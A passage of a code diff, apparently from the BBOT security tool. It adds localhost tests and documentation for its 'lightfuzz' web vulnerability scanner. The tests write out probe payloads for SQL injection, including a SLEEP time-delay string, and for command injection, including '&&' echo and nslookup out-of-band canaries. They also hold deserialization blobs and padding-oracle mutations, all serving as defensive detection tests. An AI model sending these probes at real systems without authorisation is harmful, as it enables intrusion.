qs.split("=")[1] + + if "&" in value: + value = value.split("&")[0] + + sql_block_normal = f""" +
+

0 search results for '{unquote(value)}'

+
+
+ """ + + sql_block_error = """ +
+

Found error in SQL query

+
+
+ """ + if value.endswith("'"): + if value.endswith("''"): + return Response(sql_block_normal, status=200) + return Response(sql_block_error, status=500) + return Response(parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + sqli_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + if e.type == "FINDING": + if ( + "Possible SQL Injection. Parameter: [search] Parameter Type: [GETPARAM] Detection Method: [Single Quote/Two Single Quote]" + in e.data["description"] + ): + sqli_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert sqli_finding_emitted, "SQLi Single/Double Quote getparam FINDING not emitted" + + +# SQLI Single Quote/Two Single Quote (postparam) +class Test_Lightfuzz_sqli_post(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["sqli"], + } + }, + } + + def request_handler(self, request): + parameter_block = """ + + """ + + if "search" in request.form.keys(): + value = request.form["search"] + + sql_block_normal = f""" +
+

0 search results for '{unquote(value)}'

+
+
+ """ + + sql_block_error = """ +
+

Found error in SQL query

+
+
+ """ + if value.endswith("'"): + if value.endswith("''"): + return Response(sql_block_normal, status=200) + return Response(sql_block_error, status=500) + return Response(parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + sqli_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "FINDING": + if ( + "Possible SQL Injection. Parameter: [search] Parameter Type: [POSTPARAM] Detection Method: [Single Quote/Two Single Quote]" + in e.data["description"] + ): + sqli_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert sqli_finding_emitted, "SQLi Single/Double Quote postparam FINDING not emitted" + + +# disable_post test +class Test_Lightfuzz_disable_post(Test_Lightfuzz_sqli_post): + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["sqli"], + "disable_post": True, + } + }, + } + + def check(self, module_test, events): + web_parameter_emitted = False + sqli_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "FINDING": + if ( + "Possible SQL Injection. 
Parameter: [search] Parameter Type: [POSTPARAM] Detection Method: [Single Quote/Two Single Quote]" + in e.data["description"] + ): + sqli_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert not sqli_finding_emitted, "post-based SQLI emitted despite post-parameters being disabled" + + +# SQLI Single Quote/Two Single Quote (headers) +class Test_Lightfuzz_sqli_headers(Test_Lightfuzz_sqli): + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + seed_events = [] + parent_event = module_test.scan.make_event( + "http://127.0.0.1:8888/", + "URL", + module_test.scan.root_event, + module="httpx", + tags=["status-200", "distance-0"], + ) + + data = { + "host": "127.0.0.1", + "type": "HEADER", + "name": "test", + "original_value": None, + "url": "http://127.0.0.1:8888", + "description": "Test Dummy Header", + } + seed_event = module_test.scan.make_event(data, "WEB_PARAMETER", parent_event, tags=["distance-0"]) + seed_events.append(seed_event) + module_test.scan.target.seeds.events = set(seed_events) + + def request_handler(self, request): + placeholder_block = """ + +

placeholder

+ + """ + + if request.headers.get("Test") is not None: + header_value = request.headers.get("Test") + + header_block_normal = f""" + +

placeholder

+

test: {header_value}

+ + """ + header_block_error = """ + +

placeholder

+

Error!

+ + """ + if header_value.endswith("'") and not header_value.endswith("''"): + return Response(header_block_error, status=500) + return Response(header_block_normal, status=200) + return Response(placeholder_block, status=200) + + def check(self, module_test, events): + sqli_finding_emitted = False + for e in events: + if e.type == "FINDING": + if ( + "Possible SQL Injection. Parameter: [test] Parameter Type: [HEADER] Detection Method: [Single Quote/Two Single Quote]" + in e.data["description"] + ): + sqli_finding_emitted = True + assert sqli_finding_emitted, "SQLi Single/Double Quote headers FINDING not emitted" + + +# SQLI Single Quote/Two Single Quote (cookies) +class Test_Lightfuzz_sqli_cookies(Test_Lightfuzz_sqli): + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + seed_events = [] + parent_event = module_test.scan.make_event( + "http://127.0.0.1:8888/", + "URL", + module_test.scan.root_event, + module="httpx", + tags=["status-200", "distance-0"], + ) + + data = { + "host": "127.0.0.1", + "type": "COOKIE", + "name": "test", + "original_value": None, + "url": "http://127.0.0.1:8888", + "description": "Test Dummy Header", + } + seed_event = module_test.scan.make_event(data, "WEB_PARAMETER", parent_event, tags=["distance-0"]) + seed_events.append(seed_event) + module_test.scan.target.seeds.events = set(seed_events) + + def request_handler(self, request): + placeholder_block = """ + +

placeholder

+ + """ + + if request.cookies.get("test") is not None: + header_value = request.cookies.get("test") + + header_block_normal = f""" + +

placeholder

+

test: {header_value}

+ + """ + + header_block_error = """ + +

placeholder

+

Error!

+ + """ + if header_value.endswith("'") and not header_value.endswith("''"): + return Response(header_block_error, status=500) + return Response(header_block_normal, status=200) + return Response(placeholder_block, status=200) + + def check(self, module_test, events): + sqli_finding_emitted = False + for e in events: + if e.type == "FINDING": + if ( + "Possible SQL Injection. Parameter: [test] Parameter Type: [COOKIE] Detection Method: [Single Quote/Two Single Quote]" + in e.data["description"] + ): + sqli_finding_emitted = True + assert sqli_finding_emitted, "SQLi Single/Double Quote cookies FINDING not emitted" + + +# SQLi Delay Probe +class Test_Lightfuzz_sqli_delay(Test_Lightfuzz_sqli): + def request_handler(self, request): + from time import sleep + + qs = str(request.query_string.decode()) + + parameter_block = """ + + + """ + if "search=" in qs: + value = qs.split("=")[1] + + if "&" in value: + value = value.split("&")[0] + + sql_block = """ +
+

0 search results found

+
+
+ """ + if "'%20AND%20(SLEEP(5))%20AND%20" in value: + sleep(5) + + return Response(sql_block, status=200) + return Response(parameter_block, status=200) + + def check(self, module_test, events): + web_parameter_emitted = False + sqldelay_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "FINDING": + if ( + "Possible Blind SQL Injection. Parameter: [search] Parameter Type: [GETPARAM] Detection Method: [Delay Probe (1' AND (SLEEP(5)) AND ')]" + in e.data["description"] + ): + sqldelay_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert sqldelay_finding_emitted, "SQLi Delay FINDING not emitted" + + +# Serialization Module (Error Resolution) +class Test_Lightfuzz_serial_errorresolution(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["serial"], + } + }, + } + + async def setup_after_prep(self, module_test): + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def request_handler(self, request): + dotnet_serial_error = """ + + Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. + +

+ + Exception Details: System.Runtime.Serialization.SerializationException: End of Stream encountered before parsing was completed.

+ + """ + + dotnet_serial_error_resolved = ( + "Deserialization successful! Object type: System.String" + ) + + dotnet_serial_html = """ + + + + Deserialization RCE Example + + +
+
+ +
+ +
+ + + +
+
+

Deserialization Test

+ Enter serialized data:
+

+

+
+
+ + + + + """ + + post_params = request.form + + if "TextBox1" not in post_params.keys(): + return Response(dotnet_serial_html, status=200) + + else: + if post_params["__VIEWSTATE"] != "/wEPDwULLTE5MTI4MzkxNjVkZNt7ICM+GixNryV6ucx+srzhXlwP": + return Response(dotnet_serial_error, status=500) + if post_params["TextBox1"] == "AAEAAAD/////AQAAAAAAAAAGAQAAAAdndXN0YXZvCw==": + return Response(dotnet_serial_error_resolved, status=200) + else: + return Response(dotnet_serial_error, status=500) + + def check(self, module_test, events): + excavate_extracted_form_parameter = False + excavate_extracted_form_parameter_details = False + lightfuzz_serial_detect_errorresolution = False + + for e in events: + if e.type == "WEB_PARAMETER": + if e.data["name"] == "TextBox1": + excavate_extracted_form_parameter = True + if ( + e.data["url"] == "http://127.0.0.1:8888/deser.aspx" + and e.data["host"] == "127.0.0.1" + and e.data["additional_params"] + == { + "__VIEWSTATE": "/wEPDwULLTE5MTI4MzkxNjVkZNt7ICM+GixNryV6ucx+srzhXlwP", + "__VIEWSTATEGENERATOR": "AD6F025C", + "__EVENTVALIDATION": "/wEdAANdCjkiIFhjCB8ta8aO/EhuESCFkFW/RuhzY1oLb/NUVM34O/GfAV4V4n0wgFZHr3czZjft8VgObR/WUivai7w4kfR1wg==", + "Button1": "Submit", + } + ): + excavate_extracted_form_parameter_details = True + if e.type == "FINDING": + if ( + e.data["description"] + == "POSSIBLE Unsafe Deserialization. 
Parameter: [TextBox1] Parameter Type: [POSTPARAM] Technique: [Error Resolution] Serialization Payload: [dotnet_base64]" + ): + lightfuzz_serial_detect_errorresolution = True + + assert excavate_extracted_form_parameter, "WEB_PARAMETER for POST form was not emitted" + assert excavate_extracted_form_parameter_details, "WEB_PARAMETER for POST form did not have correct data" + assert ( + lightfuzz_serial_detect_errorresolution + ), "Lightfuzz Serial module failed to detect ASP.NET error resolution based deserialization" + + +# Serialization Module (Error Differential) +class Test_Lightfuzz_serial_errordifferential(Test_Lightfuzz_serial_errorresolution): + def request_handler(self, request): + java_serial_error = """ + +

Internal Server Error

+

java.io.StreamCorruptedException: invalid stream header: 0C400304

+ + """ + + java_serial_error_keyword = """ + +

Internal Server Error

+

java.lang.ClassCastException: Cannot cast java.lang.String to lab.actions.common.serializable.AccessTokenUser

+ + """ + + java_serial_html = """ + + + + Deserialization RCE Example + + + Please log in to continue. + + + """ + + cookies = request.cookies + + if "session" not in cookies.keys(): + response = Response(java_serial_html, status=200) + response.set_cookie("session", value="", max_age=3600, httponly=True) + return response + + else: + if cookies["session"] == "rO0ABXQABHRlc3Q=": + return Response(java_serial_error_keyword, status=500) + else: + return Response(java_serial_error, status=500) + + def check(self, module_test, events): + excavate_extracted_cookie_parameter = False + lightfuzz_serial_detect_errordifferential = False + + for e in events: + if e.type == "WEB_PARAMETER": + if e.data["description"] == "Set-Cookie Assigned Cookie [session]" and e.data["type"] == "COOKIE": + excavate_extracted_cookie_parameter = True + + if e.type == "FINDING": + if ( + e.data["description"] + == "POSSIBLE Unsafe Deserialization. Parameter: [session] Parameter Type: [COOKIE] Technique: [Differential Error Analysis] Error-String: [cannot cast java.lang.string] Payload: [java_base64_string_error]" + ): + lightfuzz_serial_detect_errordifferential = True + + assert excavate_extracted_cookie_parameter, "WEB_PARAMETER for cookie was not emitted" + assert ( + lightfuzz_serial_detect_errordifferential + ), "Lightfuzz Serial module failed to detect Java error differential based deserialization" + + +# CMDi echo canary +class Test_Lightfuzz_cmdi(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["cmdi"], + } + }, + } + + def request_handler(self, request): + qs = str(request.query_string.decode()) + + parameter_block = """ + + """ + if "search=" in qs: + value = qs.split("=")[1] + + if "&" in value: + value = value.split("&")[0] + + if "%26%26%20echo%20" in value: + cmdi_value = 
value.split("%26%26%20echo%20")[1].split("%20")[0] + else: + cmdi_value = value + cmdi_block = f""" +
+

0 search results for '{unquote(cmdi_value)}'

+
+
+ """ + return Response(cmdi_block, status=200) + + return Response(parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + cmdi_echocanary_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "FINDING": + if ( + "POSSIBLE OS Command Injection. Parameter: [search] Parameter Type: [GETPARAM] Detection Method: [echo canary] CMD Probe Delimeters: [&&]" + in e.data["description"] + ): + cmdi_echocanary_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert cmdi_echocanary_finding_emitted, "echo canary CMDi FINDING not emitted" + + +# CMDi interactsh +class Test_Lightfuzz_cmdi_interactsh(Test_Lightfuzz_cmdi): + @staticmethod + def extract_subdomain_tag(data): + pattern = r"search=.+%26%26%20nslookup%20(.+)\.fakedomain\.fakeinteractsh.com%20%26%26" + match = re.search(pattern, data) + if match: + return match.group(1) + + config_overrides = { + "interactsh_disable": False, + "modules": { + "lightfuzz": { + "enabled_submodules": ["cmdi"], + } + }, + } + + def request_handler(self, request): + qs = str(request.query_string.decode()) + + parameter_block = """ + + """ + + if "search=" in qs: + subdomain_tag = None + subdomain_tag = self.extract_subdomain_tag(request.full_path) + + if subdomain_tag: + self.interactsh_mock_instance.mock_interaction(subdomain_tag) + return Response(parameter_block, status=200) + + async def setup_before_prep(self, module_test): + self.interactsh_mock_instance = module_test.mock_interactsh("lightfuzz") + + 
module_test.monkeypatch.setattr( + module_test.scan.helpers, "interactsh", lambda *args, **kwargs: self.interactsh_mock_instance + ) + + async def setup_after_prep(self, module_test): + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + cmdi_interacttsh_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "VULNERABILITY": + if ( + "OS Command Injection (OOB Interaction) Type: [GETPARAM] Parameter Name: [search] Probe: [&&]" + in e.data["description"] + ): + cmdi_interacttsh_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert cmdi_interacttsh_finding_emitted, "interactsh CMDi FINDING not emitted" + + +class Test_Lightfuzz_speculative(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + modules_overrides = ["httpx", "excavate", "paramminer_getparams", "lightfuzz"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": {"enabled_submodules": ["xss"]}, + "paramminer_getparams": {"wordlist": tempwordlist([]), "recycle_words": True}, + }, + } + + def request_handler(self, request): + + qs = str(request.query_string.decode()) + parameter_block = """ + { + "search": 1, + "common": 1 + } + """ + if "search=" in qs: + value = qs.split("=")[1] + if "&" in value: + value = value.split("&")[0] + xss_block = f""" +
+

0 search results for '{unquote(value)}'

+
+
+ """ + return Response(xss_block, status=200) + return Response(parameter_block, status=200, headers={"Content-Type": "application/json"}) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + excavate_json_extraction = False + xss_finding_emitted = False + + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter (speculative from json content) [search]" in e.data["description"]: + excavate_json_extraction = True + + if e.type == "FINDING": + if "Possible Reflected XSS. Parameter: [search] Context: [Between Tags" in e.data["description"]: + xss_finding_emitted = True + + assert excavate_json_extraction, "Excavate failed to extract json parameter" + assert xss_finding_emitted, "Between Tags XSS FINDING not emitted" + + +class Test_Lightfuzz_crypto_error(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + modules_overrides = ["httpx", "excavate", "lightfuzz"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": {"enabled_submodules": ["crypto"]}, + }, + } + + def request_handler(self, request): + qs = str(request.query_string.decode()) + + parameter_block = """ +
+
+ + +
+
+ """ + crypto_block = """ +
+

Access Denied!

+
+
+ """ + if "secret=" in qs: + value = qs.split("=")[1] + if value: + return Response(crypto_block, status=200) + + return Response(parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + cryptoerror_parameter_extracted = False + cryptoerror_finding_emitted = False + + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [secret] (GET Form Submodule)" in e.data["description"]: + cryptoerror_parameter_extracted = True + if e.type == "FINDING": + if ( + "Possible Cryptographic Error. Parameter: [secret] Parameter Type: [GETPARAM] Original Value: [08a5a2cea9c5a5576e6e5314edcba581d21c7111c9c0c06990327b9127058d67]" + in e.data["description"] + ): + cryptoerror_finding_emitted = True + assert cryptoerror_parameter_extracted, "Parameter not extracted" + assert cryptoerror_finding_emitted, "Crypto Error Message FINDING not emitted" + + +class Test_Lightfuzz_crypto_error_falsepositive(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + modules_overrides = ["httpx", "excavate", "lightfuzz"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": {"enabled_submodules": ["crypto"]}, + }, + } + + def request_handler(self, request): + fp_block = """ +
+
+ + +
+

Access Denied!

+
+ """ + return Response(fp_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + cryptoerror_parameter_extracted = False + cryptoerror_finding_emitted = False + + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [secret] (GET Form Submodule)" in e.data["description"]: + cryptoerror_parameter_extracted = True + if e.type == "FINDING": + if "Possible Cryptographic Error" in e.data["description"]: + cryptoerror_finding_emitted = True + assert cryptoerror_parameter_extracted, "Parameter not extracted" + assert ( + not cryptoerror_finding_emitted + ), "Crypto Error Message FINDING was emitted (it is an intentional false positive)" + + +class Test_PaddingOracleDetection(ModuleTestBase): + + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "excavate", "lightfuzz"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["crypto"], + } + }, + } + + def request_handler(self, request): + encrypted_value = quote( + "dplyorsu8VUriMW/8DqVDU6kRwL/FDk3Q+4GXVGZbo0CTh9YX1YvzZZJrYe4cHxvAICyliYtp1im4fWoOa54Zg==" + ) + default_html_response = f""" + + +
+ + +
+ + + """ + + if "/decrypt" in request.url and request.method == "POST": + if request.form and request.form["encrypted_data"]: + encrypted_data = request.form["encrypted_data"] + if "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALwAgLKWJi2nWKbh9ag5rnhm" in encrypted_data: + response_content = "Padding error detected" + elif "4GXVGZbo0DTh9YX1YvzZZJrYe4cHxvAICyliYtp1im4fWoOa54Zg" in encrypted_data: + response_content = "DIFFERENT CRYPTOGRAPHIC ERROR" + elif "AAAAAAA" in encrypted_data: + response_content = "YET DIFFERENT CRYPTOGRAPHIC ERROR" + else: + response_content = "Decryption failed" + + return Response(response_content, status=200) + else: + return Response(default_html_response, status=200) + + async def setup_after_prep(self, module_test): + module_test.set_expect_requests_handler(expect_args=re.compile(".*"), request_handler=self.request_handler) + + def check(self, module_test, events): + for e in events: + print(f"{e.type}: {e.data}") + + web_parameter_extracted = False + cryptographic_parameter_finding = False + padding_oracle_detected = False + for e in events: + + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [encrypted_data] (POST Form" in e.data["description"]: + web_parameter_extracted = True + if e.type == "FINDING": + if ( + e.data["description"] + == "Probable Cryptographic Parameter. Parameter: [encrypted_data] Parameter Type: [POSTPARAM] Original Value: [dplyorsu8VUriMW/8DqVDU6kRwL/FDk3Q%2B4GXVGZbo0CTh9YX1YvzZZJrYe4cHxvAICyliYtp1im4fWoOa54Zg%3D%3D] Detection Technique(s): [Single-byte Mutation, Data Truncation] Envelopes: [URL-Encoded]" + ): + cryptographic_parameter_finding = True + + if e.type == "VULNERABILITY": + if ( + e.data["description"] + == "Padding Oracle Vulnerability. 
Block size: [16] Parameter: [encrypted_data] Parameter Type: [POSTPARAM] Original Value: [dplyorsu8VUriMW/8DqVDU6kRwL/FDk3Q%2B4GXVGZbo0CTh9YX1YvzZZJrYe4cHxvAICyliYtp1im4fWoOa54Zg%3D%3D] Envelopes: [URL-Encoded]" + ): + padding_oracle_detected = True + + assert web_parameter_extracted, "Web parameter was not extracted" + assert cryptographic_parameter_finding, "Cryptographic parameter not detected" + assert padding_oracle_detected, "Padding oracle vulnerability was not detected" diff --git a/bbot/test/test_step_2/module_tests/test_module_reflected_parameters.py b/bbot/test/test_step_2/module_tests/test_module_reflected_parameters.py new file mode 100644 index 0000000000..90e88ee7b6 --- /dev/null +++ b/bbot/test/test_step_2/module_tests/test_module_reflected_parameters.py @@ -0,0 +1,46 @@ +from .base import ModuleTestBase +from werkzeug.wrappers import Response +import re + +from .test_module_paramminer_getparams import TestParamminer_Getparams + + +class TestReflected_parameters_fromexcavate(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "reflected_parameters", "excavate"] + + def request_handler(self, request): + normal_block = 'foo' + qs = str(request.query_string.decode()) + if "reflected=" in qs: + value = qs.split("=")[1] + if "&" in value: + value = value.split("&")[0] + reflected_block = f'' + return Response(reflected_block, status=200) + else: + return Response(normal_block, status=200) + + async def setup_after_prep(self, module_test): + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + assert any( + e.type == "FINDING" + and e.data["description"] + == "GET Parameter value reflected in response body. 
Name: [reflected] Source Module: [excavate] Original Value: [foo]" + for e in events + ) + + +class TestReflected_parameters_fromparamminer(TestParamminer_Getparams): + modules_overrides = ["httpx", "paramminer_getparams", "reflected_parameters"] + + def check(self, module_test, events): + assert any( + e.type == "FINDING" + and "GET Parameter value reflected in response body. Name: [id] Source Module: [paramminer_getparams]" + in e.data["description"] + for e in events + ) diff --git a/docs/modules/lightfuzz.md b/docs/modules/lightfuzz.md new file mode 100644 index 0000000000..35b0e4987f --- /dev/null +++ b/docs/modules/lightfuzz.md @@ -0,0 +1,105 @@ +# Lightfuzz + +## Philosophy + +### What is Lightfuzz? + +Lightfuzz is a lightweight web vulnerability scanner built into BBOT. It is designed to find "low-hanging fruit" type vulnerabilities without much overhead and at massive scale. + +### What is Lightfuzz NOT? + +Lightfuzz is not, does not attempt to be, and will never be, a replacement for a full-blown web application scanner. You should not, for example, be running Lightfuzz as a replacement for Burp Suite scanning. Burp Suite scanner will always find more (even though we can find a few things it can't). + +It will also not help you *exploit* vulnerabilities. It's job is to point out vulnerabilities, or likely vulnerabilities, or potential vulnerabilities, and then pass them off to you. A great deal of the overhead with traditional scanners comes in the confirmation phase, or in testing exploitation payloads. + +So for example, Lightfuzz may detect an XSS vulnerability for you. But its NOT going to help you figure out which tag you need to use to get around a security filter, or give you any kind of a final payload. It's simply going to tell you that the contents of a given GET parameter are being reflected and that it was able to render an unmodified HTML tag. The rest is up to you. 
+
+### False Positives
+
+Significant work has gone into minimizing false positives. However, due to the nature of how Lightfuzz works, they are a reality. Random hiccups in network connectivity can cause them in some cases, odd WAF behavior can account for others.
+
+If you see a false positive that you feel is occurring too often or could easily be prevented, please open a GitHub issue and we will take a look!
+
+## Modules
+
+Lightfuzz is divided into numerous "submodules". These would typically be run all together, but they can be configured to be run individually or in any desired configuration. This would be done with the aid of a `preset`, more on those in a moment.
+
+### `cmdi` (Command Injection)
+ - Finds output-based and blind out-of-band (via `Interactsh`) command injections
+### `crypto` (Cryptography)
+ - Identifies cryptographic parameters that have a tangible effect on the application
+ - Can identify padding oracle vulnerabilities
+ - Can identify hash length extension vulnerabilities
+### `path` (Path Traversal)
+ - Can find arbitrary file read / local-file include vulnerabilities, based on relative path traversal or with absolute paths
+### `serial` (Deserialization)
+ - Can identify the active deserialization of a variety of deserialization types across several platforms
+### `sqli` (SQL Injection)
+ - Error Based SQLi Detection
+ - Blind time-delay SQLi Detection
+### `ssti` (Server-side Template Injection)
+ - Can find basic server-side template injection
+### `xss` (Cross-site Scripting)
+ - Can find a variety of XSS types, across several different contexts (between-tags, attribute, Javascript-based)
+## Presets
+
+Lightfuzz comes with a few pre-defined presets. The first thing to know is that, unless you really know BBOT inside and out, we recommend using one of them. This is because, to be successful, Lightfuzz needs to change a lot of very important BBOT settings.
These include:
+
+* Turning the web spider on, and setting a reasonable web spider distance and depth.
+```
+  web:
+    spider_distance: 3
+    spider_depth: 4
+```
+
+* Setting `url_querystring_remove` to False. By default, BBOT strips away querystrings, so in order to FUZZ GET parameters, that default has to be disabled.
+```
+url_querystring_remove: False
+```
+* Setting the `excavate` internal module to retain querystrings when it finds new URLs
+```
+  excavate:
+    retain_querystring: True
+```
+* Enabling several other complementary modules. Specifically, `hunt` and `reflected_parameters` are useful companion modules when `WEB_PARAMETER` events are being emitted.
+
+If you don't want to dive into those details, and we don't blame you, here are the built-in preset options and what you need to know about the differences.
+
+# -p lightfuzz
+
+This is the default setting, and it enables all submodules. It changes all of the essential BBOT settings to make Lightfuzz work, without too many extras. However it is important to note that it **DISABLES FUZZING POST REQUESTS**. This is because this type of request is the most intrusive, and the most likely to cause problems, especially if it's run against an internal network.
+
+# -p lightfuzz-intense
+
+* Increases the web spider settings a bit from the default.
+* Adds in the **Param Miner** suite of modules to try and find new parameters to fuzz via brute-force
+* Enables fuzzing of POST parameters
+
+# -p lightfuzz-max
+
+Everything included in `lightfuzz-intense`, plus:
+
+* Query string collapsing turned OFF. Normally, multiple instances of the same parameter (e.g., foo=bar and foo=bar2) are collapsed into one for fuzzing. With `lightfuzz-max`, each instance is fuzzed individually.
+* Force common headers enabled - Fuzz certain common header parameters, even if we didn't discover them
+
+These settings aren't typically desired, as they add significant time to the scan.
+
+# -p lightfuzz-xss
+
+This is a special Lightfuzz preset that focuses entirely on XSS, to make XSS hunting as fast as possible. It is an example of how to make a preset that focuses on specific submodules. It also includes the `paramminer_getparams` module to help find undocumented parameters to fuzz.
+
+# Usage
+
+With the presets in mind, usage is incredibly simple. In most cases you will just do the following:
+
+```
+bbot -p lightfuzz -t targets.txt
+```
+
+It's really that simple. Almost all output from Lightfuzz will be in the form of a `FINDING`, as opposed to a `VULNERABILITY`, with a couple of exceptions. This is because, as was explained, the findings are typically unconfirmed and will require work on your part to confirm them.
+
+If you wanted a specific submodule:
+
+```
+bbot -p lightfuzz -t targets.txt -c modules.lightfuzz.enabled_submodules[xss]
+```
\ No newline at end of file
diff --git a/poetry.lock b/poetry.lock
index 9dc7f17d5e..6a5f69cc91 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -1654,32 +1654,32 @@ virtualenv = ">=20.10.0"
 [[package]]
 name = "psutil"
-version = "6.1.0"
+version = "6.1.1"
 description = "Cross-platform lib for process and system monitoring in Python."
optional = false python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,>=2.7" files = [ - {file = "psutil-6.1.0-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:ff34df86226c0227c52f38b919213157588a678d049688eded74c76c8ba4a5d0"}, - {file = "psutil-6.1.0-cp27-cp27m-manylinux2010_i686.whl", hash = "sha256:c0e0c00aa18ca2d3b2b991643b799a15fc8f0563d2ebb6040f64ce8dc027b942"}, - {file = "psutil-6.1.0-cp27-cp27m-manylinux2010_x86_64.whl", hash = "sha256:000d1d1ebd634b4efb383f4034437384e44a6d455260aaee2eca1e9c1b55f047"}, - {file = "psutil-6.1.0-cp27-cp27mu-manylinux2010_i686.whl", hash = "sha256:5cd2bcdc75b452ba2e10f0e8ecc0b57b827dd5d7aaffbc6821b2a9a242823a76"}, - {file = "psutil-6.1.0-cp27-cp27mu-manylinux2010_x86_64.whl", hash = "sha256:045f00a43c737f960d273a83973b2511430d61f283a44c96bf13a6e829ba8fdc"}, - {file = "psutil-6.1.0-cp27-none-win32.whl", hash = "sha256:9118f27452b70bb1d9ab3198c1f626c2499384935aaf55388211ad982611407e"}, - {file = "psutil-6.1.0-cp27-none-win_amd64.whl", hash = "sha256:a8506f6119cff7015678e2bce904a4da21025cc70ad283a53b099e7620061d85"}, - {file = "psutil-6.1.0-cp36-abi3-macosx_10_9_x86_64.whl", hash = "sha256:6e2dcd475ce8b80522e51d923d10c7871e45f20918e027ab682f94f1c6351688"}, - {file = 